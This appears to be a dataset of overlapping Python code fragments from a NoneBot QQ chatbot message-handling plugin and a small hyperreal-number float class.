f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor = Distributor() #", "% response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else:", "request.msg is None: text = message['data']['text'].strip() # 呼叫检测 for name in self_names: if", "获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return", "':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc):", "= image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return response_list # 用于执行Response序列 async def execute(response_list:", "request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type'] == 'location': request.loc = {'longitude':", "msg[:max_length] # msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg) else: # 群消息", "float(message['data']['lat'])} elif message['type'] not in ['face', 'at', 'anonymous', 'share', 'reply']: request.echo = True", "'新版手机QQ' in text: request.echo = True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text continue #", "True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测 if text != '':", "header='QQBot') elif message['type'] == 'record' and request.aud is None: request.aud = os.path.join(PATHS['cqhttp'], 'data',", "if 'group_id' in session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else: # 私聊时 bot_called = True", "% text continue # 空文本检测 if text != '': request.msg = text elif", "= text[len(name):] while text[-len(name):] == name: text = text[:-len(name)] for sign in [None,", "'林子逸', '子兔', 'xsx', '小石像'] bot_called = False if request.user_id == self_id: logging.debug('=========== [MultiBot]", "text: # 被叫到时 bot_called = True text = text.strip() while text[:len(name)] == name:", "# 私聊 await session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left !=", "nonebot porter ==========') return elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter", "request.img = message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record' and", "= msg[:max_length] # msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg) else: #", "await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列", "except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except", "= message['data']['text'].strip() # 呼叫检测 for name in self_names: if name in text: #", "from ....requests import Request from ....responses import * from ....distributor import Distributor from", "if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg): msg = response.text for at_id in response.at_list:", "[3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session: NLPSession): return IntentCommand(100.0,", "session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' %", "while len(msg) > 0: msg_left = msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length] #", "[] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def _(session: NLPSession): return IntentCommand(100.0, 'porter', args={'message': session.msg_text})", "# 初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img =", "name: text = text[len(name):] while text[-len(name):] == name: text = text[:-len(name)] for sign", "= True text = text.strip() while text[:len(name)] == name: text = text[len(name):] while", "bot_called = True if 'group_id' in session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else: # 私聊时", "f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if", "str(at_id) # 过长文本多次发送 max_length = 2000 while len(msg) > 0: msg_left = msg[max_length:]", "text = text.strip() while text[:len(name)] == name: text = text[len(name):] while text[-len(name):] ==", "= msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length] # msg只保留maxL内的部分 if isinstance(response, ResponseMsg): #", "消息段检测 if '请使用' in text and '新版手机QQ' in text: request.echo = True request.msg", "# 消息段检测 if '请使用' in text and '新版手机QQ' in text: request.echo = True", "await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try: output = await eval('session.bot.%s' % response.func_name)(**response.kwargs)", "[MultiBot] Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = Request() request.platform", "session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '': # 这轮超出部分为0时 msg = msg_left else: msg", "else: msg = '' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or", "@on_command('porter') async def porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列", "os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type'] == 'location': request.loc = {'longitude': float(message['data']['lon']), 'latitude':", "request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return response_list # 用于执行Response序列 async", "if name in text: # 被叫到时 bot_called = True text = text.strip() while", "execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行", "return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async def porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered", "isinstance(response, ResponseGrpMsg): msg = response.text for at_id in response.at_list: msg += '[CQ:at,qq=%s]' %", "self_id = str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called =", "for at_id in response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length =", "= False if request.user_id == self_id: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return", "诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False):", "'latitude': float(message['data']['lat'])} elif message['type'] not in ['face', 'at', 'anonymous', 'share', 'reply']: request.echo =", "....requests import Request from ....responses import * from ....distributor import Distributor from ....utils", "* from ....distributor import Distributor from ....utils import image_url_to_path from ....paths import PATHS", "request.group_id = str(session.ctx['group_id']) else: # 私聊时 bot_called = True for message in session.ctx['message']:", "session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except:", "在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await", "import PATHS import os, logging, traceback # BLACKLIST = [3288849221] BLACKLIST = []", "',', None]: text = text.strip(sign) # 消息段检测 if '请使用' in text and '新版手机QQ'", "'': # 这轮超出部分为0时 msg = msg_left else: msg = '' elif isinstance(response, ResponseMusic):", "def porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered nonebot porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包", "# 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = Request() request.platform = 'CQ' request.user_id = str(session.ctx['user_id'])", "and '新版手机QQ' in text: request.echo = True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text continue", "nonebot porter ==========') return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called = True", "execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return # 刷新并保存最新的session信息 distributor.refresh_and_save() logging.debug('===========", "on_natural_language, NLPSession, IntentCommand from ....requests import Request from ....responses import * from ....distributor", "CommandSession, on_command from nonebot import on_natural_language, NLPSession, IntentCommand from ....requests import Request from", "% str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: #", "# 过长文本多次发送 max_length = 2000 while len(msg) > 0: msg_left = msg[max_length:] #", "elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot porter", "{'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not in ['face', 'at', 'anonymous', 'share', 'reply']:", "SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) #", "message['type'] not in ['face', 'at', 'anonymous', 'share', 'reply']: request.echo = True request.msg =", "porter ==========') # 在任何情况下,把所有消息打包成Request交给分拣中心(Distributor),然后处理分拣中心发回的Response序列 # Resqust打包 request = Request() request.platform = 'CQ' request.user_id", "porter ==========') return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called = True if", "in ['face', 'at', 'anonymous', 'share', 'reply']: request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\", "text = text.strip(sign) # 消息段检测 if '请使用' in text and '新版手机QQ' in text:", "Request from ....responses import * from ....distributor import Distributor from ....utils import image_url_to_path", "if message['type'] == 'text' and request.msg is None: text = message['data']['text'].strip() # 呼叫检测", "ResponseMsg): # 私聊 await session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left", "bot_called = True text = text.strip() while text[:len(name)] == name: text = text[len(name):]", "logging.debug('=========== [MultiBot] Left nonebot porter ==========') return elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot]", "in session.ctx['message']: if message['type'] == 'text' and request.msg is None: text = message['data']['text'].strip()", "text and '新版手机QQ' in text: request.echo = True request.msg = '【NonebotPorter】不支持的消息段:\"%s\"' % text", "output = await eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except", "初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img = image_url_to_path(request.img,", "==========') return elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return", "msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id,", "elif message['type'] == 'image' and request.img is None: # 先不下载图片,获取response时下载 request.img = message['data']['url']", "request.aud is None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type'] == 'location':", "float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not in ['face', 'at', 'anonymous', 'share', 'reply']: request.echo", "await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]'", "in self_names: if name in text: # 被叫到时 bot_called = True text =", "elif message['type'] == 'record' and request.aud is None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices',", "async def _(session: NLPSession): return IntentCommand(100.0, 'porter', args={'message': session.msg_text}) @on_command('porter') async def porter(session:", "if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called = True if 'group_id' in session.ctx.keys():", "= '【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测 if text != '': request.msg =", "message=img_msg) elif isinstance(response, ResponseCQFunc): try: output = await eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError:", "in [None, ',', ',', None]: text = text.strip(sign) # 消息段检测 if '请使用' in", "[MultiBot] Left nonebot porter ==========') return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called", "被叫到时 bot_called = True text = text.strip() while text[:len(name)] == name: text =", "= text.strip() while text[:len(name)] == name: text = text[len(name):] while text[-len(name):] == name:", "['face', 'at', 'anonymous', 'share', 'reply']: request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:',", "+= '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length = 2000 while len(msg) > 0:", "'[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg)", "text[:-len(name)] for sign in [None, ',', ',', None]: text = text.strip(sign) # 消息段检测", "# 呼叫检测 for name in self_names: if name in text: # 被叫到时 bot_called", "if request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return response_list # 用于执行Response序列", "'group_id' in session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else: # 私聊时 bot_called = True for", "request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not in ['face', 'at', 'anonymous',", "'record' and request.aud is None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type']", "Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list =", "False if request.user_id == self_id: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return elif", "None: text = message['data']['text'].strip() # 呼叫检测 for name in self_names: if name in", "session.msg_text}) @on_command('porter') async def porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered nonebot porter ==========') #", "True text = text.strip() while text[:len(name)] == name: text = text[len(name):] while text[-len(name):]", "0: msg_left = msg[max_length:] # msg超出maxL的部分 msg = msg[:max_length] # msg只保留maxL内的部分 if isinstance(response,", "msg_left != '': # 这轮超出部分为0时 msg = msg_left else: msg = '' elif", "self_names: if name in text: # 被叫到时 bot_called = True text = text.strip()", "被at时 bot_called = True if 'group_id' in session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else: #", "is None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif message['type'] == 'location': request.loc", "get_responses(): if request.img: request.img = image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return response_list #", "私聊时 bot_called = True for message in session.ctx['message']: if message['type'] == 'text' and", "isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg):", "in session.ctx.keys(): request.group_id = str(session.ctx['group_id']) else: # 私聊时 bot_called = True for message", "in response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length = 2000 while", "header='QQBot') response_list = distributor.handle(request=request) return response_list # 用于执行Response序列 async def execute(response_list: list): for", "'' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): #", "in response_list: try: if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg): msg = response.text for", "True for message in session.ctx['message']: if message['type'] == 'text' and request.msg is None:", "= text[:-len(name)] for sign in [None, ',', ',', None]: text = text.strip(sign) #", "distributor.handle(request=request) return response_list # 用于执行Response序列 async def execute(response_list: list): for response in response_list:", "args={'message': session.msg_text}) @on_command('porter') async def porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered nonebot porter ==========')", "== name: text = text[:-len(name)] for sign in [None, ',', ',', None]: text", "elif message['type'] not in ['face', 'at', 'anonymous', 'share', 'reply']: request.echo = True request.msg", "img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg) else: await", "isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if", "'data', 'voices', message['data']['file']) elif message['type'] == 'location': request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])}", "AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError:", "# 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('===========", "traceback # BLACKLIST = [3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def", "eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s'", "import CommandSession, on_command from nonebot import on_natural_language, NLPSession, IntentCommand from ....requests import Request", "logging.debug('=========== [MultiBot] Left nonebot porter ==========') return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时", "群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '': # 这轮超出部分为0时 msg = msg_left", "== 'image' and request.img is None: # 先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img", "'image' and request.img is None: # 先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img =", "except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif", "logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): #", "= 'CQ' request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸',", "return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called = True if 'group_id' in", "ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg =", "= Request() request.platform = 'CQ' request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id) self_names =", "os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response,", "response.text for at_id in response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length", "= f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息", "while text[:len(name)] == name: text = text[len(name):] while text[-len(name):] == name: text =", "# 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return #" ]
[ "class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map = { 'one' : {'one' : 'one'", "'epsilon' : 'ε', 'one': ''}.get(self.unit, ) f = HFloat(1, unit = 'epsilon') #", ": {'one' : 'omega' , 'omega' : 'omega', 'epsilon' : 'one'}, 'epsilon': {'one'", "= other.unit newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self,", "'one'): # Float is immutable, so overwrite new as well self.unit = unit", "__str__(self): return super().__str__() + {'omega' : 'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit, )", "'one' , 'omega' : 'omega', 'epsilon' : 'epsilon'}, 'omega' : {'one' : 'omega'", "__truediv__(self, other): return super().__truediv__(other) def __add__(self, other): if not self.unit and not other.unit:", "https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map = { 'one' : {'one'", "{'one' : 'epsilon', 'omega' : 'one' , 'epsilon' : 'epsilon'}, } def __new__(self,", "def __init__(self,value, unit = 'one'): super(float, self).__init__() def __mul__(self, other): if type(other) !=", ": 'omega' , 'omega' : 'omega', 'epsilon' : 'one'}, 'epsilon': {'one' : 'epsilon',", "# Float is immutable, so overwrite new as well self.unit = unit return", "HFloat\"\"\" mul_map = { 'one' : {'one' : 'one' , 'omega' : 'omega',", "for HFloat\"\"\" mul_map = { 'one' : {'one' : 'one' , 'omega' :", "'epsilon', 'omega' : 'one' , 'epsilon' : 'epsilon'}, } def __new__(self, value, unit", "'one': ''}.get(self.unit, ) f = HFloat(1, unit = 'epsilon') # print(f.unit) # print(f)", "super().__str__() + {'omega' : 'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit, ) f =", ": 'omega', 'epsilon' : 'epsilon'}, 'omega' : {'one' : 'omega' , 'omega' :", "'omega' : 'omega', 'epsilon' : 'one'}, 'epsilon': {'one' : 'epsilon', 'omega' : 'one'", "'omega', 'epsilon' : 'one'}, 'epsilon': {'one' : 'epsilon', 'omega' : 'one' , 'epsilon'", "float.__new__(self, value) def __init__(self,value, unit = 'one'): super(float, self).__init__() def __mul__(self, other): if", "return super().__str__() + {'omega' : 'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit, ) f", "is immutable, so overwrite new as well self.unit = unit return float.__new__(self, value)", ") f = HFloat(1, unit = 'epsilon') # print(f.unit) # print(f) print(f +", "as well self.unit = unit return float.__new__(self, value) def __init__(self,value, unit = 'one'):", ": 'ε', 'one': ''}.get(self.unit, ) f = HFloat(1, unit = 'epsilon') # print(f.unit)", "def __truediv__(self, other): return super().__truediv__(other) def __add__(self, other): if not self.unit and not", "HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map = { 'one' : {'one' : 'one' ,", "of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map = { 'one'", "'one' else: ounit = other.unit newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval,", "f = HFloat(1, unit = 'epsilon') # print(f.unit) # print(f) print(f + 1)", "<filename>20180530_struct_hyperreal.py \"\"\" Hyperreal numbers as an extension of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float):", "Hyperreal numbers as an extension of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for", "float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map = { 'one' :", "return HFloat(newval, newunit) def __truediv__(self, other): return super().__truediv__(other) def __add__(self, other): if not", "= 'one'): # Float is immutable, so overwrite new as well self.unit =", "other.unit: return def __str__(self): return super().__str__() + {'omega' : 'ω', 'epsilon' : 'ε',", "def __mul__(self, other): if type(other) != HFloat: ounit = 'one' else: ounit =", "{'omega' : 'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit, ) f = HFloat(1, unit", "unit return float.__new__(self, value) def __init__(self,value, unit = 'one'): super(float, self).__init__() def __mul__(self,", "= HFloat(1, unit = 'epsilon') # print(f.unit) # print(f) print(f + 1) #", "def __add__(self, other): if not self.unit and not other.unit: return def __str__(self): return", "mul_map = { 'one' : {'one' : 'one' , 'omega' : 'omega', 'epsilon'", "not other.unit: return def __str__(self): return super().__str__() + {'omega' : 'ω', 'epsilon' :", "'epsilon' : 'epsilon'}, } def __new__(self, value, unit = 'one'): # Float is", "{'one' : 'one' , 'omega' : 'omega', 'epsilon' : 'epsilon'}, 'omega' : {'one'", "__init__(self,value, unit = 'one'): super(float, self).__init__() def __mul__(self, other): if type(other) != HFloat:", "'epsilon': {'one' : 'epsilon', 'omega' : 'one' , 'epsilon' : 'epsilon'}, } def", "return float.__new__(self, value) def __init__(self,value, unit = 'one'): super(float, self).__init__() def __mul__(self, other):", "self).__init__() def __mul__(self, other): if type(other) != HFloat: ounit = 'one' else: ounit", "'ε', 'one': ''}.get(self.unit, ) f = HFloat(1, unit = 'epsilon') # print(f.unit) #", "as an extension of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map", "HFloat(newval, newunit) def __truediv__(self, other): return super().__truediv__(other) def __add__(self, other): if not self.unit", "other): return super().__truediv__(other) def __add__(self, other): if not self.unit and not other.unit: return", "Float is immutable, so overwrite new as well self.unit = unit return float.__new__(self,", "self.unit and not other.unit: return def __str__(self): return super().__str__() + {'omega' : 'ω',", "if type(other) != HFloat: ounit = 'one' else: ounit = other.unit newval =", "other.unit newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self, other):", "__mul__(self, other): if type(other) != HFloat: ounit = 'one' else: ounit = other.unit", ": 'epsilon'}, } def __new__(self, value, unit = 'one'): # Float is immutable,", "return super().__truediv__(other) def __add__(self, other): if not self.unit and not other.unit: return def", "\"\"\"docstring for HFloat\"\"\" mul_map = { 'one' : {'one' : 'one' , 'omega'", "'epsilon'}, } def __new__(self, value, unit = 'one'): # Float is immutable, so", "= 'one'): super(float, self).__init__() def __mul__(self, other): if type(other) != HFloat: ounit =", "an extension of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map =", "'omega' : {'one' : 'omega' , 'omega' : 'omega', 'epsilon' : 'one'}, 'epsilon':", "newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self, other): return", "'omega' : 'one' , 'epsilon' : 'epsilon'}, } def __new__(self, value, unit =", "def __str__(self): return super().__str__() + {'omega' : 'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit,", ": 'one' , 'omega' : 'omega', 'epsilon' : 'epsilon'}, 'omega' : {'one' :", "'one'): super(float, self).__init__() def __mul__(self, other): if type(other) != HFloat: ounit = 'one'", "= unit return float.__new__(self, value) def __init__(self,value, unit = 'one'): super(float, self).__init__() def", "other): if type(other) != HFloat: ounit = 'one' else: ounit = other.unit newval", "and not other.unit: return def __str__(self): return super().__str__() + {'omega' : 'ω', 'epsilon'", "ounit = 'one' else: ounit = other.unit newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit]", "new as well self.unit = unit return float.__new__(self, value) def __init__(self,value, unit =", "else: ounit = other.unit newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit)", ": {'one' : 'one' , 'omega' : 'omega', 'epsilon' : 'epsilon'}, 'omega' :", "if not self.unit and not other.unit: return def __str__(self): return super().__str__() + {'omega'", "'epsilon') # print(f.unit) # print(f) print(f + 1) # print(f/2) # print(f/0) #", "super(float, self).__init__() def __mul__(self, other): if type(other) != HFloat: ounit = 'one' else:", "HFloat: ounit = 'one' else: ounit = other.unit newval = super().__mul__(other) newunit =", "= 'epsilon') # print(f.unit) # print(f) print(f + 1) # print(f/2) # print(f/0)", ": 'epsilon'}, 'omega' : {'one' : 'omega' , 'omega' : 'omega', 'epsilon' :", ": 'omega', 'epsilon' : 'one'}, 'epsilon': {'one' : 'epsilon', 'omega' : 'one' ,", "unit = 'epsilon') # print(f.unit) # print(f) print(f + 1) # print(f/2) #", "'omega' , 'omega' : 'omega', 'epsilon' : 'one'}, 'epsilon': {'one' : 'epsilon', 'omega'", "{'one' : 'omega' , 'omega' : 'omega', 'epsilon' : 'one'}, 'epsilon': {'one' :", "overwrite new as well self.unit = unit return float.__new__(self, value) def __init__(self,value, unit", "'one' , 'epsilon' : 'epsilon'}, } def __new__(self, value, unit = 'one'): #", "!= HFloat: ounit = 'one' else: ounit = other.unit newval = super().__mul__(other) newunit", "'epsilon'}, 'omega' : {'one' : 'omega' , 'omega' : 'omega', 'epsilon' : 'one'},", "'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit, ) f = HFloat(1, unit = 'epsilon')", "\"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map = { 'one' : {'one' :", "{ 'one' : {'one' : 'one' , 'omega' : 'omega', 'epsilon' : 'epsilon'},", "= HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self, other): return super().__truediv__(other) def __add__(self, other):", "\"\"\" Hyperreal numbers as an extension of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring", ", 'omega' : 'omega', 'epsilon' : 'one'}, 'epsilon': {'one' : 'epsilon', 'omega' :", "= 'one' else: ounit = other.unit newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return", "well self.unit = unit return float.__new__(self, value) def __init__(self,value, unit = 'one'): super(float,", ": 'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit, ) f = HFloat(1, unit =", "so overwrite new as well self.unit = unit return float.__new__(self, value) def __init__(self,value,", "def __new__(self, value, unit = 'one'): # Float is immutable, so overwrite new", 